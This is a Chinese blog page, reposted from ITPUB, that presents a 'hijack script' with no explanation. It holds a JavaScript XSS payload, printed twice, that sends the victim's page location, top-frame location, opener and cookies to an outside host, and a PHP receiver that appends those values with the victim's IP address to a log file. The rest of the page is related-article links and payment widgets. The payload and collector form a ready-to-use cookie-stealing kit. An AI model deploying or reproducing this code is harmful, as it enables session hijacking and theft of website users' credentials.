劫持脚本

最新推荐文章于 2024-06-14 09:22:46 发布
最新推荐文章于 2024-06-14 09:22:46 发布
阅读量150 收藏
点赞数
文章标签: php
var x=new Image(); try { var myopener=''; myopener=window.opener && window.opener.location ? window.opener.location : ''; } catch(err) { } x.src='http://2.c.gp/?location='+escape(document.location)+'&toplocation='+escape(top.document.location)+'&cookie='+escape(document.cookie)+'&opener='+escape(myopener);

<?php
if($_GET){
$location = $_GET["location"];
$toplocation = $_GET["toplocation"];
   $cookie = $_GET["cookie"];
   $opener = $_GET["opener"];
   $ip = $_SERVER['REMOTE_ADDR'];
   $date = date('Y:m:d H:i:s');
   
   $fp = fopen('xss.txt','a+');
   $xss = " location:".$location."\n toplocation:".$toplocation."\n cookie:".$cookie."\n opener:".$opener."\n ip:".$ip."\n date:".$date."\n  ------------------------------------------------------------------------------------------- \n";
   fputs($fp,$xss);
   fclose($fp);
   }
if($_POST['del']=='ok'){
$fp = fopen('xss.txt','w');
fputs($fp,"\n");
fclose($fp);
}   

?>

var x=new Image(); try { var myopener=''; myopener=window.opener && window.opener.location ? window.opener.location : ''; } catch(err) { } x.src='http://2.c.gp/?location='+escape(document.location)+'&toplocation='+escape(top.document.location)+'&cookie='+escape(document.cookie)+'&opener='+escape(myopener);
X.JS

来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/31448824/viewspace-2137662/,如需转载,请注明出处,否则将追究法律责任。

转载于:http://blog.itpub.net/31448824/viewspace-2137662/

cuanlielian4510
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
IE 自动设置脚本
07-25
通过脚本自动设置IE配置
用于删除注册表autoconfigurl,即局域网设置里的自动配置脚本
11-02
工具使用前提是先清理掉病毒和驱动木马。
js恶意脚本劫持网页怎么解决?
cainang19850211的博客
09-16 1440
  要预防JS劫持,首先要把我们网站的安全做好,买空间服务器最好是选择大的平台比如阿里云、腾讯云等,修改完网站后记得更换所有的账号密码,网站要记得时常备份,这样你的网站出现问题可以及时的覆盖还原。  先通过iis7网站监控,输入自己的域名,就可以立马看到自己是不是遭遇JS劫持了,并且查询结果都是实时的,可以利用查询结果来更好的优化我们的网站。然后按下面的步骤解决  一、首先直接输入域名打开你的网站...
java反序列化劫持脚本_Java反序列化漏洞自动挖掘方法
weixin_28327051的博客
02-28 218
你说什么最难受,是相爱的人见不了面,还是最爱的人在别人身边。。。---- 网易云热评文章来源:蚂蚁非攻安全实验室 、先知白帽大会一、序列化与反序列化1、定义:序列化是用于将对象转换成二进制串存储,对应着 writeObject,反序列正好相反,将二进制串转换成对象,对应着 Freadobject 2、各编程语言都存在:Java:java.io.Serializable接口、fastjson、ja...
鼠标自动点击脚本_613个主流网站中发现点击劫持脚本
weixin_39830906的博客
12-05 398
香港中文大学、微软研究院、韩国首尔大学和宾夕法尼亚大学的研究人员对点击劫持进行了研究,发现有613个主流网站存在拦截用户点击的恶意脚本。Clickjacking即点击劫持,已经广泛应用于广告行业了,犯罪分子也利用它来执行在线广告的隐藏或其他用户并不希望的点击来增加收入。过去犯罪分子依赖恶意软件或自动化脚本来生成对隐藏广告的虚假点击,但近年来,犯罪分子开始劫持真实的用户点击。研究人员开发了...
关于解决WMI浏览器劫持问题--如果开了杀软可能打不开本页面,因为我贴了劫持脚本
jin9xiao的博客
11-29 463
这里只说WMI的解决方法: 先说现象: 通过chrome快捷方式打开后(包括开始菜单和任务栏里的),直接会打开一个流氓网站 查看快捷方式发现“目标栏”里,启动路径最后多了那个流氓网站的地址,删除后,隔一段时间会再被加上去。 =================================================================================== ...
python秒杀脚本 拼多多_点击劫持漏洞之理解 python打造一个挖掘点击劫持漏洞的脚本...
weixin_39605997的博客
12-10 1013
前言:放假了,上个星期刚刚学习完点击劫持漏洞。没来的及写笔记,今天放学总结了一下并写了一个检测点击劫持脚本。点击劫持脚本说一下哈。= =原本是打算把网站源码中的js也爬出来将一些防御的代码匹配一下。可惜,爬出来的js链接乱的一匹。弄了很久也很乱。所以就没有匹配js文件了。漏洞介绍:漏洞名称:点击劫持漏洞(Clicking hijacking)级别:中级漏洞用于场景:钓鱼,欺骗。《黑客攻防之浏览器...
Python 通过监听端口实现唯一脚本运行方式
12-20
我就废话不多说了,大家还是直接看代码吧 try: s = socket.socket() s.bind(('127.0.0.1', port)) except: log.info(' * already has an instance, so exit.') exit(0) 补充知识:Python:一个简单的tornado...
XSS跨站脚本攻击剖析与防御.pdf
05-16
第2章 XSS利用方式,就当前比较流行的XSS利用方式做了深入的剖析,这些攻击往往基于客户端,从挂马、窃取Cookies、会话劫持到钓鱼欺骗,各种攻击都不容忽视。第3章 XSS测试和利用工具,介绍了一些常见的XSS测试工具...
详解JSON和JSONP劫持以及解决方法
01-19
json劫持 json劫持攻击又为”JSON Hijacking”,攻击过程有点类似于csrf,只不过csrf只管发送http请求,但是json-hijack的目的是获取敏感数据。 一些web应用会把一些敏感数据以json的形式返回到前端,如果仅仅...
关于解决WMI浏览器劫持问题--如果开了杀软可能打不开本页面,因为我贴了劫持脚本...
jin9xiao的博客
06-20 2146
这里只说WMI的解决方法:先说现象:通过chrome快捷方式打开后(包括开始菜单和任务栏里的),直接会打开一个流氓网站查看快捷方式发现“目标栏”里,启动路径最后多了那个流氓网站的地址,删除后,隔一段时间会再被加上去。===================================================================================这里说下排查方法用...
PHP异常处理的最佳实践及常见问题解决
NatLindsay的博客
06-11 270
异常处理的基本原理是,当try块中的代码发生异常时,PHP会寻找匹配的catch块进行处理,如果没有找到对应的catch块,则异常会向上传递直至被处理为止。PHP异常处理是在开发过程中至关重要的一环,它能够帮助开发人员捕获和处理程序运行过程中的错误和异常情况,提高代码的稳定性和可靠性。在实际开发中,可能会遇到各种各样的异常处理问题,比如异常未被捕获、异常信息不清晰、异常处理性能问题等。合理地使用自定义异常类能够使异常处理更加灵活和规范化,有助于统一异常信息和错误码,提高代码的可维护性和可读性。
源码编译安装LAMP
潇的博客
06-12 832
LAMP 架构是目前成熟的企业网站应用模式之一,指的是协同工作的一整套系统和相关软件,能够提供动态Web站点服务及其应用开发环境。LAMP是一个缩写词,具体包括Linux操作系统、Apache网站服务器、MySQL数据库服务器、PHP(或Perl、Python)网页编程语言。本章将以源码编译的方式搭建LAMP环境,能够满足企业定制化的需求。在构建LAMP平台时,各组件的安装顺序依次为Linux、Apache、MySQL、PHP。其中Apache和MySQL的安装并没有严格的顺序;
无回显XXE攻击:隐秘的数据泄露技术
最新发布
weixin_43822401的博客
06-14 371
无回显XXE攻击是一种隐蔽的数据泄露手段,攻击者可以在不引起目标服务器注意的情况下获取敏感信息。了解这种攻击的原理和防御策略对于保护网络安全至关重要。通过本文的介绍,希望读者能够提高对无回显XXE攻击的认识,并采取相应的防护措施。
软考初级网络管理员_07_网络单选题
2301_80961833的博客
06-12 909
部分主机无法与该DHCP服务器正常通信,这些主机客户端系统自动生成了169.254.0.0范围内的地址。部分主机无法与该DHCP服务器正常通信,这些主机客户端系统自动生成了127.254.0.0范围内的地址。通过ARP协议可以获取目的端的MAC地址和UUID的地址。你必须先接入Internet,别人才可以给你发送电子邮件。只要你的E-Mai 地址有效,别人就可以给你发送电子邮件。你只有打开了自己的计算机,别人才可以给你发送电子邮件。关于虚拟局域网,下面的描述中错误的是()。
网络安全练气篇——PHP编程语言基础
weixin_55762309的博客
06-13 932
(外文名:PHP:Hypertext Preprocessor,中文名:“超文本预处理器”) 是一种通用开源脚本语言。语法吸收了C语言、Java和Perl的特点,利于学习,使用广泛,主要适用于Web开发领域。用PHP做出的动态页面与其他的编程语言相比,PHP是将程序嵌入到HTML(标准通用标记语言下的一个应用) 文档中去执行,执行效率比完全生成HTML标记的CGI要高许多,PHP还可以执行编译后代码,编译可以达到加密和优化代码运行,使代码运行更快。
最新大屏幕互动系统PHP源码 附动态背景图和配乐素材 含搭建教程
爱酷码的博客
06-10 250
最新大屏幕互动系统PHP源码 附动态背景图和配乐素材 含搭建教程。测试环境:Nginx+PHP7.0+MySQL5.6。
xss跨站脚本攻击实操
05-14
攻击者可以利用这些信息进行Session劫持等攻击。 通过以上步骤,我们可以简单地演示XSS攻击的危害和实现过程。在实际应用中,为了防止XSS攻击,我们需要对输入进行严格的过滤和转义,以保证用户的安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值